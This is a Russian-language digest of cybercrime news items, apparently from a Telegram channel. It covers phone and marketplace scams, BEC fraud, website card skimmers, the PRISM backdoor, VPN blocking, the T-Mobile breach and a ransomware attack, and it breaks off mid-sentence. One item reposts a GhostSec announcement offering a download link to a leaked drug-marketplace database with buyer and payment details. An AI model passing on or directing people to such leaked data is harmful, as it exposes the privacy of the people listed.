Успешная реализация BEC-схем ежегодно обходится организациям в десятки и сотни миллионов долларов. Такие мошенники в основном действуют в Северной Америке и Европе, однако последнее время их интересует также Россия. Количество подобных целевых атак неуклонно растет, создавая дополнительные трудности для работников ИБ-служб.
Эффективность BEC-схемы во многом зависит от убедительности рассылаемых по почте фальшивок: безграмотный текст письма сразу выдаст подлог. Чтобы избежать таких ошибок, мошенники начали вербовать фрилансеров, способных поддерживать переписку на английском языке — предпочтительно тех, для кого он родной. В этом году исследователи из Intel 471 обнаружили в сетевом андеграунде множество таких предложений сотрудничества, в том числе на русскоязычных форумах.
Изучение объявлений современных BEC-скамеров показало, что они также готовы отдать на аутсорс отмывание денег, полученных неправедным путем. С этой целью мошенники зачастую используют криптовалютные миксеры или тамблеры — сервисы, позволяющие повысить степень анонимности путем распределения монет между сотнями тысяч кошельков или смешивания их с транзакциями других пользователей.
• Source: https://intel471.com/blog/bec-cybercrime-underground
Известный наркорынок "RareChems" полная база данных Дамп здесь
этот дамп включает в себя информацию обо всех покупателях/поставщиках,
информацию о платежах и многое другое
RareChems является известным рынком наркотиков в сотрудничестве с другими,
также считается розничным магазином для "Lizard Labs"
#GhostSec
Download: https://t.me/GhostSecc/88
ENGLISH
Known Drug marketplace "RareChems" full database Dump here
this dump includes info on all the buyers/suppliers, payment information and much much more
RareChems is a known Drug marketplace in collaboration with others also considered the retail store for "Lizard Labs"
#GhostSec
В следственной части Следственного управления УМВД России по городу Магнитогорску окончены уголовные дела, возбужденные по признакам преступлений, предусмотренных частью 3 статьи 158 Уголовного кодекса Российской Федерации и частью 2 статьи 159 УК РФ, в отношении двух жителей города Иркутска 1989 и 1991 года рождения.
Из материалов дел следует, что на обвиняемых, входивших в состав преступной группы, специализирующейся на дистанционном обмане и завладении денежными средствами граждан, возлагались функции по снятию и перечислению похищенных денег соучастникам группы. С каждого перевода фигуранты забирали себе 3% от суммы. Связь между участниками осуществлялась только через различные мессенджеры, таким образом, лично между собой соучастники знакомы не были. География дистанционных мошенничеств распространялась на все регионы Российской Федерации, в том числе одной из жертв стал житель г. Магнитогорска, которому позвонили неизвестные, представившиеся сотрудниками банка. Под предлогом проверки личного кабинета потерпевшего, убедили его установить приложение «удаленного доступа», после чего похитили денежные средства, которые впоследствии были обналичены обвиняемыми, и переведены на счета других участников группы. Установлена причастность задержанных к 4 противоправным эпизодам, в ходе которых ими были переведены на счета участников преступной группы более 300 тысяч рублей.
Противоправная деятельность задержанных пресечена оперативниками уголовного розыска УМВД России по городу Магнитогорску. В настоящее время сотрудниками полиции проводятся мероприятия, направленные на установление всех фигурантов преступной группы.
На период следствия одному из задержанных избиралась мера пресечения в видео подписки о невыезде и надлежащем поведении, второму – заключение под стражу.
В соответствии с законодательством обвиняемым грозит до 6 лет лишения свободы.
Уголовное дело с обвинительным заключением, утвержденным прокурором Ленинского района города Магнитогорска, направлено в суд для рассмотрения по существу.
*******
В Шумихе в результате проведения оперативно-розыскных мероприятий сотрудниками отдела по противодействию хищениям, совершенным с использованием информационно-телекоммуникационных технологий Управления уголовного розыска УМВД России по Курганской области совместно оперативниками межмуниципального отдела МВД России «Шумихинский» при силовой поддержке сотрудников СОБР Управления Росгвардии по Курганской области задержан 43-летний ранее неоднократно судимый местный житель, подозреваемый в совершении серии мошенничеств.
Как установили сотрудники полиции, злоумышленник обзванивал исключительно пожилых жителей Центральной России, владельцев абонентских номеров одного из популярных операторов сотовой связи. Представившись сотрудником этой компании, он сообщал потерпевшим, что происходит смена старого оборудования и для того, чтобы абонентские номера не были заблокированы необходимо самостоятельно путем введения определенных комбинаций на мобильном телефоне провести переподключение к новому оборудованию. В результате после выполнения всех указаний звонившего через мобильное приложение с банковских карт заявителей списывались денежные средства в среднем от семи до десяти тысяч рублей. В настоящее время установлена его причастность к совершению четырех таких противоправных деяний.
В ходе обыска по месту жительства подозреваемого оперативники обнаружили и изъяли банковские карты, сим-карты, мобильные телефоны, а также незаконно хранящееся огнестрельное оружие.
По данным фактам следователем межмуниципального отдела МВД России «Шумихинский» возбуждены уголовные дела по признакам преступлений, предусмотренным частью 2 статьи 159 УК РФ «Мошенничество», частью 1 статьи 222 УК РФ «Незаконные приобретение, передача, сбыт, хранение, перевозка, пересылка или ношение оружия, основных частей огнестрельного оружия, боеприпасов». В отношении задержанного избрана мера пресечения в виде заключения под стражу.
Расследование продолжается. Фигурант отрабатывается на причастность к совершения подобных противоправных деяний.
В Польше [началось](https://www.theguardian.com/world/2024/apr/01/poland- launches-inquiry-into-previous-governments-spyware-use) масштабное расследование использования спайвари Pegasus предыдущим правительством. Прежняя партия власти проиграла выборы в октябре прошлого года и вместе с этим лишилась права на незаконную слежку.
Уголовные обвинения могут ждать бывших министров, сотрудников спецслужб и других лиц. Министр юстиции сообщает, что полный список жертв слежки пока останется конфиденциальным, так как в нём много известных лиц, а не только уже названные политики. Кроме того, расследуют как были получены разрешения на слежку: в Польше штампуют их на автомате, и предполагается, что от судов скрыли детали запросов под использование Pegasus. В общем, занятный пример того, что спайвари хорошо живётся только в странах, где власть имущих выносят исключительно вперёд ногами, и законность её применения некому поставить под вопрос.
@tomhunter
Сотрудниками УЭБиПК ГУ МВД России по Пермскому краю совместно с коллегами из отдела МВД России «Бардымский» задержан 29-летний житель Барды. Он подозревается в хищении бюджетных средств с использованием проекта «Пушкинская карта», реализуемого в рамках национального проекта «Культура».
Предварительно установлено, что в 2023 году злоумышленник во взаимодействии с неустановленными лицами организовал схему вывода денег с «Пушкинских карт».
«С целью совершения преступления мужчина получил доступ к одному из онлайн- сервисов по продаже билетов. С помощью специального приложения он размещал информацию о проведении вымышленных культурно-досуговых мероприятий. Держатели «Пушкинских карт» приобретали билеты на концерты, дискотеки, интерактивные игры, которые в реальности не были организованы и проведены. После оплаты денежные средства перечислялись на счета, подконтрольные злоумышленнику.
Следственными органами возбуждено уголовное дело по части 4 статьи 159 Уголовного кодекса Российской Федерации. По решению суда в отношении подозреваемого избрана мера пресечения в виде заключения под стражу», – сообщила официальный представитель МВД России Ирина Волк.
Правоохранительные органы задержали мужчину по подозрению в краже товаров одного из маркетплейсов на сумму около 6 миллионов рублей, сообщает пресс- служба ГУ МВД России по Ростовской области.
«В отношении подозреваемого возбуждено уголовное дело по признакам преступления, предусмотренного пунктом «в» части 3 статьи 158 УК РФ «Кража». Ему избрана мера пресечения в виде заключения под стражу», — добавили в ведомстве.
По данным следствия, задержанный имел доступ к взломанным аккаунтам индивидуальных предпринимателей, которые реализовывали свой товар на площадке интернет-магазина. При этом объектами краж становились только крупные подрядчики, обладающие складами с большим количеством ассортимента различных вещей.
«Имея на руках доступ к личным данным, злоумышленник самостоятельно оформлял заявки от имени потерпевших, которые находились в различных городах страны, на срочное перемещение принадлежащих им товаров в город Донецк Ростовской области. Когда необходимые позиции прибывали на склад, то мужчина приходил в пункты выдачи и, используя QR-код, забирал чужое имущество, а после реализовал его через интернет-магазины», — рассказали в МВД.
Киберполиция Днепропетровской области разоблачила злоумышленников во вмешательстве в программное обеспечение электросчетчиков.
Как сообщила пресс-служба Департамента киберполиции, правонарушители продавали через интернет технические средства для счетчиков, позволявшие потребителям «уменьшить» плату за услуги.
Противоправную деятельность организовали пятеро жителей Днепра. Они использовали вебсайты, где продавали приборы и программно-аппаратные комплексы для вмешательства в работу программного обеспечения электросчетчиков. Клиентам предлагали изготовление и установку различных самодельных технических средств для уменьшения реальных показателей потребления электроэнергии.
Правоохранители провели 11 обысков по адресам проживания фигурантов, в офисах, складских помещениях и в их автомобилях. По результатам изъята компьютерная техника, банковские и SIM-карты, а также около тысяч различных приборов для вмешательства в работу счетчиков.
Открыто уголовное производство по ч. 2 ст. 361 (несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи) УК Украины.
Фигурантам может грозить до шести лет лишения свободы.
• Source: cyberpolice.gov.ua/news/kiberpolicziya-dnipropetrovshhyny-vykryla- zlovmysnykiv-u-vtruchanni-v-programne-zabezpechennya-elektrolichylnykiv-1397/
Безработный житель Харькова разместил на сайте OLX объявление о продаже мини- трактора Dong Feng 244 по привлекательной низкой цене, хотя в реальности, такой техники не имел и поставлять ее покупателям не намеревался.
Вскоре с ним связался фермер из Ровенской области, который выразил желание приобрести трактор. Обсудив детали сделки, стороны договорились о предоплате 50% на карту продавца, что составляло 27 тысяч гривен. В тот же день фермер перечислил деньги, а мошенник снял их через банкомат в одном из супермаркетов Харькова.
В этот же день трактором заинтересовался еще один покупатель из Житомира, который на тех же условиях перечислил на карту злоумышленника 27 тысяч гривен. Спустя 3 недели ситуация повторилась: на этот раз жертвой мошенника стал фермер из Коростеня, который заплатил за несуществующий трактор 27,9 тысяч гривен предоплаты.
Оценив по достоинству потенциал выбранной ниши, мошенник решил разместить на OLX новое объявление – на сей раз, о продаже мини-трактора Kubota B3520. Ждать долго не пришлось – довольно скоро нашелся новый покупатель из Харьковской области. Этот доверчивый человек перевел за несуществующий трактор на карту мошенника 20 тысяч гривен.
Тем временем, на основании заявлений потерпевших, было возбуждено уголовное расследование и правоохранители вручили мошеннику письменное подозрение. Допрошенный в совершенных действиях чистосердечно признался, после чего... подался в бега.
Когда правоохранителям удалось, наконец, задержать мошенника, они уже не были так уверены в искренности его раскаяния и перспективах исправления. Учитывая возросший риск уклонения от правосудия, подозреваемый был взят под стражу и помещен в следственный изолятор Харькова. Условием выхода на свободу суд определил внесение залога в размере 181,6 тысяч гривен, которые безработный мошенник вряд ли отыщет, находясь в СИЗО.
Суд инкриминирует подозреваемому нарушение ч.3 ст. 190 УК (мошенничество, совершенное повторно, с использование электронно-вычислительной техники). Санкции этой статьи предусматривают тюремное заключение на срок от 3 до 8 лет. Маловероятно, что преступнику грозит максимально строгий приговор, однако, учитывая историю с бегством, вряд ли удастся отделаться условным сроком. В настоящий момент, следствие продолжается.
Число попыток списаний доходило до десятка тысяч в минуту.
Украинский разработчик приложений в начале военной операции России пытался массово списать деньги с карт клиентов Сбербанка, заявил зампред правления кредитной организации Станислав Кузнецов. По его словам, число попыток списаний доходило до десятка тысяч в минуту. В целом системы Сбербанка отклонили несколько сотен тысяч попыток списаний.
По его словам, компания имела около 50 различных приложений: продавали подписку на планы питания, фитнес-программы и прочее. В нарушение требований международных платежных систем, собирала и хранила данные банковских карт своих клиентов. В один день компания инициировала массовые списания по всей накопленной базе данных. Всего Сбербанк отклонил несколько сотен тысяч попыток списаний, отметил Кузнецов.
"Причем все было совершенно легально, ведь они продавали в приложениях легальные услуги — подписку на планы питания, фитнес-программы и прочее. В один день компания инициировала массовые списания по всей накопленной базе данных", — подытожил Кузнецов.
В целом, после начала военной операции в Украине в несколько раз снизилось число так называемых фишинговых атак (вид интернет-мошенничества, цель которого — получение доступа к конфиденциальным данным пользователей — логинам и паролям) на физические лица. Дело в том, что большинство мошенников находились за границей и им стало сложнее выводить деньги из-за приостановки деятельности платежных систем Visa и MasterCard.
Заражению подверглись два популярных американских магазина оружия.
Два американских оружейных магазина, Rainier Arms и Numrich Gun Parts, сообщили об утечке платежных данных клиентов после обнаружения скиммеров на своих сайтах. Онлайн-скиммеры написаны на JS и работают так же, как и реальные скиммеры.
Компания Rainier Arms заявила, что начала получать сообщения о несанкционированной активности платежных карт своих клиентов еще в декабре 2021 года. Проведя расследование, 21 апреля 2022 года компания обнаружила на своем сайте скиммер и определила, что он активно собирал платежные данные клиентов в период с 1 июня 2021 года по 19 января 2022 года. Rainier Arms отправила 46 319 уведомлений пострадавшим клиентам, копии которых можно найти на онлайн-портале генерального прокурора штата Монтана .
С Numrich Gun Parts Corporation произошло примерно то же самое – компания обнаружила скиммер 28 марта 2022 года и при проведении собственного расследования обнаружила, что вредонос похищал платежные данные клиентов в период с 23 января 2022 года по 5 апреля 2022 года. Согласно уведомлению , переданному в офис генерального прокурора штата Мэн, число пострадавших клиентов составляет 45 169 человек, все они получат уведомление о нарушении данных в ближайшие дни.
Специалисты порекомендовали всем клиентам компаний, совершившим покупки в периоды работы скиммеров, немедленно обратиться в свой банк с просьбой о замене карты.
source:
media.dojmt.gov/wp-content/uploads/Rainier-Arms-Consumer-Notification-
Letter.pdf
apps.web.maine.gov/online/aeviewer/ME/40/c85b1a09-ea9b-4402-abb0-4d404f02d730.shtml
apps.web.maine.gov/online/aeviewer/ME/40/c85b1a09-ea9b-4402-abb0-4d404f02d730/629c65dc-2c9a-4c95-9607-9c694c078227/document.html
Как сообщают СМИ, Роскомнадзор (РКН) впервые включил протокол Shadowsocks в список VPN-сервисов, подпадающих под блокировку. Для блокировки этого протокола ведомство будет использовать технические средства противодействия угрозам (ТСПУ) на трансграничных соединениях.
Как отмечает издание «Коммерсант», созданный в Китае для обхода ценуры протокол Shadowsocks чаще всего используют простые граждане для частных VPN и ИБ-специалисты. Так как он маскирует свой трафик под другие ресурсы, блокировка может нарушить работу многих легальных сервисов.
Ранее в сети появилось письмо Минтранса, направленное в адрес 381 организации транспортной отрасли от 10 ноября 2023 года. В частности, на него обратил внимание Telegram-канал «ЗаТелеком».
Из документа следует, что Роскомнадзор может блокировать 49 различных VPN- сервисов и протоколов через централизованное управление сетью общего пользования (с помощью ТСПУ, которые установлены на сетях операторов связи по закону «о суверенном рунете»). Для обеспечения работы информсистем, которые могут использовать VPN для защищенных соединений и удаленного доступа, организации должны предоставить информацию об используемых сервисах и протоколах до 15 ноября 2023 года.
В Роскомнадзоре отказались от комментариев, относительно этого документа, а в Минтрансе не ответили на запрос журналистов.
Как сообщили изданию эксперты, чтобы избежать проблем с блокировками корпоративных сетей, использующих VPN, РКН запрашивает у разных отраслей информацию о том, какими сервисами они пользуются, а затем «создаются так называемые белые списки».
[](https://xakep.ru/wp- content/uploads/2023/11/441850/List.png)
Как видно из таблицы выше, в список ведомства вошел не только протокол Shadowsocks, но даже сервис ItHelper российского разработчика «Софт Программ», предназначенный для ускорения работы устройств со встроенным VPN. Журналисты отмечают, что подписка на него свободно продается в «М.Видео-Эльдорадо».
Массовые проблемы с работой VPN-сервисов в России начались еще летом 2022 года. Тогда Роскомнадзор стал экспериментировать с блокировкой конкретных протоколов (отмечались проблемы с L2TP, IKEv2 и IPsec), а в августе текущего года пользователи стали сообщать о проблемах в работе OpenVPN и WireGuard.
Как объяснил собеседник «Коммерсанта», сначала Роскомнадзор блокировал VPN по IP-адресам, однако они могут меняться, и приходится регулярно пополнять реестр. Однако, по его словам, OpenVPN и WireGuard — достаточно распространенные протоколы, которые часто используются для построения защищенных соединений компании, и от Shadowsocks они отличаются тем, что не маскируют трафик при соединении, «поскольку исходно они не создавались для обхода цензуры и блокировок». Поэтому их, в отличие от Shadowsocks, проще заблокировать с использованием средств ТСПУ.
Другой источник издания уточнил, что блокировка Shadowsocks «через анализ трафика будет очень непростой из-за обсфускации — высоки риски затронуть другие, вполне легальные сервисы».
По мнению главы Ассоциации малых операторов связи (объединяет 100 провайдеров) Дмитрия Галушко, массовая блокировка VPN, использующих функцию обфускации, «неизбежно грозит рисками недоступности ряда легальных сервисов, а также может создавать нагрузку на сети операторов».
Установлено, что от действий 32-летнего осужденного пострадали более 30 жителей разных областей Украины. Находясь в СИЗО, он звонил с собственного мобильного, обманом получая у граждан конфиденциальную информацию для доступа к их счетам или же побудил собеседников совершать переводы средств в мобильном банкинге.
Следователи следственного управления ГУНП в Житомирской области выяснили, что 32-летний житель Киевской области ранее был неоднократно осужден. Последний раз - в феврале 2023 - за нанесение умышленных тяжких телесных повреждений, и сейчас находится в следственном изоляторе одного из исправительных учреждений на Житомирщине.
Уже отбывая наказание, он начал новую противоправную деятельность. Для этого мужчина звонил жителям разных регионов Украины и назывался работником банка. Он сообщал абонентам, что на их счета поступили выплаты от сервиса финансового учреждения, а для получения средств якобы необходимо было совершить определенные действия в банковском мобильном приложении.
Доверчивые собеседники придерживались указаний, предоставленных им «менеджером банка», а в результате теряли собственные средства. Кое-где количество проведенных финансовых операций, совершенных одним потерпевшим под «мошенническим сопровождением», достигало десяти.
Еще в ряде случаев мужчина выманивал у граждан сведения о номерах их банковских карт и пин-коды, а затем самостоятельно совершал переводы в собственную пользу.
Убытки, нанесенные потерпевшим, колеблются от 900 до почти 115 000 гривен. А общая сумма, которую выманил заключенный, составляет более 503 тысяч гривен.
В феврале 2024 полицейские, при содействии работников оперативного подразделения учреждения, пресекли преступную деятельность мужчины. Следователи при сопровождении оперативников Управления уголовного розыска ГУНП области провели обыск в помещении, где содержался осужденный. В результате изъяли средство связи, сим-карты мобильных операторов, черновые записи.
Кроме того, по ходатайству следователей, был наложен арест на денежные средства на банковских счетах, которые использовал подозреваемый, с целью обеспечения возмещения причиненного ущерба потерпевшим.
Поэтому собрав необходимые доказательства и показания, получив результаты судебных экспертиз, следователи инкриминировали мужчине завладение чужим имуществом путем обмана (мошенничества), совершенном повторно, путем незаконных операций с использованием электронно-вычислительной техники (ч. 2, ч. 4 ст. 190 УК Украины). Процессуальное руководство осуществляла Житомирская областная прокуратура. Сейчас материалы направлены в суд.
В соответствии с действующим законодательством обвиняемому грозит наказание в виде лишения свободы на срок от трех до восьми лет.
zt.npu.gov.ua/news/oshukav-ukraintsiv-na-ponad-piv-miliona-hryven-na- zhytomyrshchyni-politsiia-zavershyla-rozsliduvannia
Исследователи в области кибербезопасности из AT&T Alien Labs обнаружили кластер исполняемых файлов Linux ELF, идентифицированных как модификации бэкдора PRISM с открытым исходным кодом. Злоумышленники использовали бэкдор в ходе нескольких кампаниях на протяжении более трех лет.
«PRISM — простой и понятный бэкдор с открытым исходным кодом. Его трафик отчетливо идентифицируется, а его двоичные файлы легко обнаружить. Несмотря на это, двоичные файлы PRISM до сих пор не обнаруживались, а его C&C-сервер оставался в сети более 3,5 лет», — отметили эксперты.
Одним из обнаруженных вариантов PRISM является WaterDrop с функцией xencrypt, которая выполняет шифрование XOR со встроеннім однобайтовым ключом 0x1F.
«Начиная с версии 7 варианта WaterDrop, образцы включают текстовую строку «WaterDropx vX start», где X — это целочисленный номер версии. До сих пор мы наблюдали версии 1, 2.2 и 3, все еще использующие имя PRISM. Версии 7, 9 и 12 называются WaterDropx. Он также использует легко идентифицируемую строку пользовательского агента «agent-waterdropx» для передачи команд и управления на основе HTTP и достигает поддоменов waterdropx[.]com», — пояснили исследователи.
Домен waterdropx[.]com был зарегистрирован на нынешнего владельца 18 августа 2017 года, а по состоянию на 10 августа 2021 года он все еще был в Сети.
По словам исследователей, помимо базовых функций PRISM, WaterDrop предоставляет XOR-шифрование для конфигурации и дополнительный процесс, который регулярно запрашивает у С&C-сервера команды для выполнения. Эта связь с сервером обычно представляет собой обычный текстовый HTTP-протокол HTTP и выполняется с помощью команды curl.
Исследователи обнаружили образцы вредоносного ПО, помеченные как PRISM v1, которые они с высокой степенью уверенности связывают с группировкой, использующей другие обнаруженные исполняемые варианты PRISM Linux ELF.
Новая версия PRISM создает дочерний процесс, который постоянно будет запрашивать у C&C-сервера команды для выполнения. PRISM v1 не поддерживает никакого вида обфускации, упаковки или шифрования двоичных файлов.
Версии PRISM v2.2 и PRISM v3 практически идентичны — обе используют командные строки BASH для сокрытия конфиденциальных данных.
• Source: <https://cybersecurity.att.com/blogs/labs-research/prism-attacks- fly-under-the-radar>
Бывший программист Apple отправится под суд за разглашение секретной информации об очках виртуальной реальности Vision Pro. Он передавал ее журналистам, чтобы замедлить разработку продукта. Apple намерена поквитаться с ним – он не желал признаваться в шпионаже до суда. Vision Pro оказался не самым успешным – продажи минимальные, много возвратов.
Под суд за слив
Компания Apple подала в суд на своего бывшего сотрудника Эндрю Ода (Andrew Aude) за разглашение секретной информации о VisionOS – операционной системе очков виртуальной реальности Vision Pro, поступивших в продажу в феврале 2024 г., пишет Neowin. Од тайно передавал сведения журналистам нескольких крупных изданий, включая The Information и Wall Street Journal, в том числе и из стремления затормозить разработку VisionOS и непосредственно Vision Pro.
Сам Од работал в Apple iOS-разработчиком. В компанию он пришел в 2016 г. и занимался оптимизацией потребления энергии аккумулятора в iOS. В иске Apple против своего теперь уже бывшего работника сказано, что его должность наделяла его доступом к засекреченной информации о десятках продуктах компании. Их названия документ не приводит.
Внушительные масштабы слежки
По данным Apple, Од занимался шпионажем и передачей сведений о VisionOS журналистам сравнительно недолго – с июня по сентябрь 2023 г. Сам факт утечки вскрылся в ноябре 2023 г.
Стоит отметить, что на тот момент гарнитура Vision Pro уже была анонсирована – Apple вкратце рассказала о ней в июне 2023 г. на конференции WWDC 2023, скрыв почти все подробности о новинке. Релиз гарнитуры состоялся в первых числах февраля 2024 г. Как сообщал CNews, в России сразу же открылись официальные предзаказы на это устройство и появились первые отечественные приложения для VisionOS. Старт продаж на российском рынке состоялся в середине февраля 2024 г.
За три месяца своей подпольной деятельности Эндрю Од успел 1400 раз связаться с журналистом Wall Street Journal посредством программ для обмена зашифрованными сообщениями. По всей видимости, это был защищенный мессенджер Signal – его название несколько раз упоминается в иске Apple.
Также Од отправил свыше 10 тыс. сообщений сотруднику издания The Information, с которым позже провел личную встречу. Согласно информации из заявления Apple, выступая в роли инсайдера, Од делился подробностями как о самой прошивке VisionOS, так и о приложении «Дневник». Попутно он раскрыл журналистам подробности о численности работающих над Vision Pro и VisionOS человек и делился деталями о других продуктах компании.
Осторожность должна быть во всем
Когда в ноябре 2023 г. о встречах Ода с журналистами стало известно службе безопасности Apple, выяснилось также, что он хранил скриншоты переписок непосредственно на своем рабочем iPhone. Тогда же была проведена очная ставка – беседа Ода с представителями Apple, в процессе которой Эндрю отпросился в туалет, где удалил «значительную часть улик» вместе с приложением Signal, указано в иске.
Один из множества скриншотов переписки, которые хранились в смартфоне Ода
На этой встрече Од свою вину признавать не стал, но была и вторая, состоявшаяся 12 декабря 2023 г. Тогда-то он и сознался, что сливал данные как минимум двум журналистам.
Ни работы, ни акций
15 декабря 2023 г. Apple уволила Ода, попросив его вернуть принадлежащие ему опционы на акции компании, которые он получил как сотрудник в качестве компенсационного пакета. Он отказался делать это и не стал делиться с компанией никакими дополнительными подробностями о своей деятельности, тем самым показав свое нежелание урегулировать спор в досудебном порядке.
Нынешний иск Apple стал следствием отказа Ода от сотрудничества. Теперь же Apple хочет через суд добиться от него возмещения убытков, размер которых не уточняет и изъятия опционов на свои акции. Отдельное требование Apple – подпись Ода под запретом о раскрытии третьим лицам абсолютно любой конфиденциальной информации о компании третьим лицам без ее на то письменного согласия.
А был ли профит
Пока неизвестно, повлияла ли подпольная деятельность Ода на сроки разработки и релиза Vision Pro, однако нельзя сказать, что этот продут пользуется массовым спросом. Эти очки наделали немало шума во время своей презентации летом 2023 г. и породили десятки китайских клонов на Android еще до выхода и еще столько же – после. После релиза в начале февраля 2024 г. Vision Pro пару недель не исчезали из новостных лент изданий, в том числе и непрофильных, однако вся эта шумиха не сделала их популярными.
Одна из причин – высокая стоимость устройства. В США очки стоят от $3500 (333 тыс. руб. по курсу ЦБ на 29 марта 2024 г.) за базовую версию с 256 ГБ памяти и без комплекта нужных аксессуаров. В России на старте продаж за них просили от 580 тыс. руб.
За рубежом быстро набрала популярность услуга часовой и даже поминутной аренды Vision Pro – многие хотели попробовать новую «игрушку», но мало кто был готов платить за нее такие деньги. Через некоторое время зарубежные магазины и вовсе столкнулись с массовым возвратом Vision Pro – наигравшись с ними, пользователи решили вернуть потраченные на них деньги.
В России новинка Apple тоже «не взлетела». Например, за две недели предзаказов оператор МТС собрал 600 заявок из 30 городов России, но не уточнил, сколько именно гарнитур в итоге было продано.
Приподнять завесу тайны смогли журналисты «Коммерсанта». В конце марта 2024 г. они сообщили, что за неполный месяц с момента релиза Vision Pro в России было реализовано лишь несколько десятков таких устройств.
Проживающий в Турции 21-летний уроженец штата Вирджиния (США) заявил, что недавний масштабный взлом американского оператора связи T-Mobile, в результате которого были похищены данные 50 млн человек, – это его рук дело.
О том, что ответственность за атаку на T-Mobile может лежать на мужчине по имени Джон Биннс (John Binns), впервые сообщил сооснователь ИБ-компании Hudson Rock Алон Гал (Alon Gal). Ранее в этом месяце Гал опубликовал в Twitter полученное им от Биннса сообщение следующего характера: «Взлом был осуществлен с целью отомстить США за похищение и пытки Джона Эрина Биннса (ЦРУ Ворон-1) в Германии агентами ЦРУ и турецкой разведки в 2019 году».
«Мы сделали это, чтобы причинить ущерб инфраструктуре США», - заявлял хакер в то время.
Теперь Биннс решил сделать публичное заявление, дав интервью изданию Wall Street Journal. Как сообщил хакер, именно он взломал T-Mobile, сидя у себя дома в Измире (Турция), где он живет со своей матерью. Его отец, который умер, когда Биннсу было два года, был американцем. Мать хакера – турчанка, и когда ему исполнилось 18 лет, они переехали жить в Турцию.
Через Telegram хакер предоставил Wall Street Journal доказательства того, что это именно он взломал T-Mobile. По его словам, он получил первоначальный доступ к сети компании в июле нынешнего года через незащищенный маршрутизатор.
Хакер искал прорехи в защите T-Mobile через интернет-адреса компании и в итоге получил доступ к ее дата-центру в Ист-Веначи (штат Вашингтон), где ему удалось изучить более ста серверов. Мужчине потребовалась одна неделя для получения доступа к серверам с персональными данными 50 млн человек. К 4 августа он похитил миллионы файлов.
«Я запаниковал, потому что у меня был доступ к чему-то большому. Их безопасность была ужасной. Вызвать шумиху было моей единственной целью», - заявил Биннс.
Хакер не сообщил, продал ли он похищенные данные, или кто-то заплатил ему за взлом T-Mobile. Хотя Биннс прямо не подтвердил, что у него были сообщники, он признался, что ему действительно потребовалась помощь в извлечении учетных данных из баз данных в сетях T-Mobile.
В интервью Wall Street Journal мужчина еще раз повторил свое заявление о том, что атака была осуществлена в отместку за отношение к нему со стороны американских правоохранительных органов за последние несколько лет.
В ноябре 2020 года Биннс подал в суд на ФБР, ЦРУ и Министерство юстиции США. Согласно исковому заявлению, он был объектом нескольких расследований киберпреступлений (в частности, он проходил фигурантом по делу ботнета Satori). Если верить истцу, он подвергался пыткам и преследованиям по подозрению в участии в ИГИЛ (террористической организации, запрещенной в РФ), хотя не имел к ней никакого отношения.
Согласно заявлению Биннса, он был незаконно похищен в Германии и Турции и незаконно помещен в психиатрическую лечебницу без его согласия.
Один из крупнейших производителей мяса — агрохолдинг «Мираторг» — подвергся хакерской атаке на информационные ресурсы. Об этом сообщает Россельхознадзор.
Специалисты в сфере безопасности установили, что мошенники использовали вредоносную программу. Вирус шифрует данные в дисковой системе зараженных компьютеров, серверов и рабочих станций. Для этого он использует уязвимости операционных систем на базе Microsoft. После совершенных действий пораженные файлы становятся нечитаемыми.
По информации источника, вирус поразил документы, используемые 18 предприятиями Группы. Среди них «Агрофирма «Благодатенская», «Белго-Ген», «Брянский бройлер», «Брянская мясная компания», «Возрождение» и др.
Как итог — у пострадавших организаций нет возможности оформлять в электронном виде производственные и транспортные ветеринарные документы на продукцию. Специалисты уже работают над устранением проблем. Процесс восстановления сложный. Обычно он занимает несколько суток, но может затянуться из-за трудоёмкости подбора шифра для самого трояна и пострадавших файлов.
Источник: AGRONEWS
Женщина стала жертвой мошенничества с QR-кодами на железнодорожной станции
стоимостью 13 тысяч фунтов стерлингов(16 тысяч баксов)
Женщина стала жертвой мошенников, которые надули QR-код на железнодорожной
станции на сумму 13 000 фунтов стерлингов.
Предполагается, что мошенники накрыли оригинальный код своим собственным на
парковке вокзала Торнаби.
Это перенаправило ее на фишинговый веб-сайт, где они смогли разузнать платежи
и информацию о карте, в результате чего жертва, потеряла тысячи фунтов.
Железнодорожная компания TransPennine Express убрала все QR-коды со своих
парковок в сентябре после сообщений о подобных мошенничествах по всей стране.
Инцидент в Торнаби (северо-восток Англии) - один из примерно 1200 случаев QR-
мошенничества, расследованных национальным центром по борьбе с мошенничеством
Великобритании за три года.
В августе жертва, пожелавшая остаться неизвестной, воспользовалась кодом, и
после того, как ее банк заблокировал ряд мошеннических платежей, мошенники
позвонили ей, представившись сотрудниками банка.
Ссылаясь на транзакции, они убедили ее в их законности и получили достаточно
информации, чтобы создать многотысячные долги на ее имя, включая кредит в 7500
фунтов стерлингов, который они взяли за несколько минут.
Под видом обучения финансовой грамотности и игре на криптобирже они обманули более 80 человек
Сотрудники полиции пресекли в Татарстане деятельность преступного сообщества, которые под видом обучения финансовой грамотности и игре на криптобирже похитили у более 80 человек 53 млн рублей. Об этом ТАСС во вторник сообщила официальный представитель МВД России.
Преступное сообщество организовали жители Самары и Ульяновской области. По версии полицейских, оно действовало на территории Татарстана с февраля 2017 по октябрь 2021 года. Для того, чтобы придать своим действиям законный вид, сообщники зарегистрировали три фирмы по предоставлению услуг по обучению финансовой грамотности и организации торгов с финансовыми инструментами на электронном рынке "Форекс" и криптобиржах. Офисы располагались в престижных торговых и бизнес-центрах в исторической части Казани.
"Незаконно завладев базой данных телефонных номеров жителей республики, фигуранты сообщали абонентам о якобы выигранных ими сертификатах на обучение стоимостью $300. Во время первого визита в офис потенциального клиента злоумышленники изучали его состоятельность, отсутствие банковских задолженностей и крупных финансовых обременений", - сказала Волк.
По ее словам, далее людям предлагалось обучение игре на бирже с предоставлением программного обеспечения и котировок акций, золота, валют. После того как человек втягивался в процесс, злоумышленники уговаривали его вложить деньги эквивалентом не менее $5 тыс. и начать зарабатывать на фондовом рынке. Тем, у кого не имелось такой суммы, они помогали получить кредит. В действительности же программное обеспечение не имело выхода на биржевой рынок. К программе, которая лишь имитировала действия игроков, был привязан криптокошелек, которым управляли обвиняемые. Поступившие на него деньги потерпевших они переводили на своей счет.
"В настоящее время потерпевшими по уголовному делу признаны более 80 человек, общая сумма ущерба превысила 53 млн рублей. Имеются основания полагать, что противоправная деятельность аферистов не ограничивается территорией Казани", - добавила представитель ведомства.
Четверых подозреваемых арестовали, двое находятся под домашним арестом, еще пятеро - под подпиской о невыезде.
Гугл тестирует новую фичу, которая будет уведомлять пользователей о том, что
установленные у них расширения в Хроме были удалены из магазина.
Сейчас они так и продолжают висеть в установленных браузерах, но так у юзера
